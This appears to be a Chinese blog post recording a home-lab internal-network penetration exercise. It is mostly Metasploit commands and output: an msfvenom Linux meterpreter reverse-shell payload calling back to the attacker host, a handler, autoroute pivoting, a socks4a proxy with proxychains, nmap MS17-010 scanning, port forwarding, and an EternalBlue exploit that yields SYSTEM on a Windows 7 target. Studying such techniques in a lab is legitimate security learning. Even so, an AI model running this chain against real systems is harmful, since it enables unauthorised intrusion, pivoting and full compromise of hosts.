内网渗透2

☞北:

1、搭建内网环境(kali、centos、win7),处于不同网段,仅主机模式效果会很好

2、对centos上搭建的web建站进行测试,获取权限、写入shell(反弹shell的时候能够接收到)

3、通过反弹的shell,进行内网探索

4、内网提权

5、。。。。。。

--------------------美丽的分割线------------------------

重新生成一个程序

Python
root@mtcx:~# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.12.53 LPORT=5555 -b "\x00" -f elf -o  /var/www/html/tcl

image.png

使用监听模块监听

Python
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > show options

image.png

设置payload

Python
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

image.png

开启监听

Python
msf5 exploit(multi/handler) > set LHOST 192.168.12.53
LHOST => 192.168.12.53
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf5 exploit(multi/handler) > run

image.png

目标机执行程序

image.png

会话建立成功

image.png

获取内网网段

Python
meterpreter > run get_local_subnets

image.png

添加路由

Python
meterpreter > run autoroute -s 192.168.159.0/24

image.png查看路由

Python
meterpreter > run autoroute -p

image.png将会话切换到后台,并使用永恒之蓝模块

Python
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

image.png

设置目标IP地址

Python
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.159.131
RHOSTS => 192.168.159.131

image.png开始执行

image.png

然后,试了好久发现这样还是没什么用。k开始改变策略。。。

搭建socks代理,直接去打win7

Python
msf5 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/server/socks4a 
msf5 auxiliary(server/socks4a) > show options

image.png

设置代理IP以及端口

Python
msf5 auxiliary(server/socks4a) > set srvhost 192.168.12.53
srvhost => 192.168.12.53
msf5 auxiliary(server/socks4a) > set srvport 9999
srvport => 9999
msf5 auxiliary(server/socks4a) > run

image.png

另启一个终端,配置代理

Python
root@mtcx:~# vim /etc/proxychains.conf 
socks4  192.168.12.53 9999        #攻击者IP

image.png

image.png

扫描下目标的445端口是否开启

image.png

可以看到445是开启再次确定这种方式是否可以测试ms17-010

Python
root@mtcx:~# proxychains nmap -Pn -sT -p 445 --script=smb-vuln-ms17-010.nse 192.168.159.131

image.png

发现通过这种方式,确实可以测试ms17-010漏洞。

端口转发

Python
端口转发是实现跳板的一项基本步骤。对于内部隔离网络中服务(web服务器等等)来说,直接访问往往是不可行的。这是因为没有配置双向路由。我们知道如何让
请求到达目标系统,但由于目标系统并不知道如何访问我们,我们的请求会最终失败.
正是因为这样所以之前的操作会出现失败的情况,所以汲取教训,开启端口转发。(emmm,这里最后并没有用到)

配置端口

Python
meterpreter > portfwd add -L 192.168.12.53 -l 2323 -p 445 -r 192.168.159.131
[*] Local TCP relay created: 192.168.12.53:2323 <-> 192.168.159.131:445

image.png

激活转发规则

Python
meterpreter > portfwd list

image.png

将会话隐藏到后台

Python
meterpreter > background
[*] Backgrounding session 1...

运用ms17-010模块,配置目标IP、端口

Python
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.159.131
RHOSTS => 192.168.159.131
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RPORT 445
RPORT => 445

image.png

设置payload为bind_tcp模块

Python
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp

image.png

image.png

开始攻击,φ(゜▽゜*)♪ 终于成功了image.png

执行下命令

Python
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

image.png

查看下还有其他网段没

image.png

没有了。。。(其他还请自行探索呢)

posted @ 2020-06-08 11:16  MTcx  阅读(272)  评论(0编辑  收藏  举报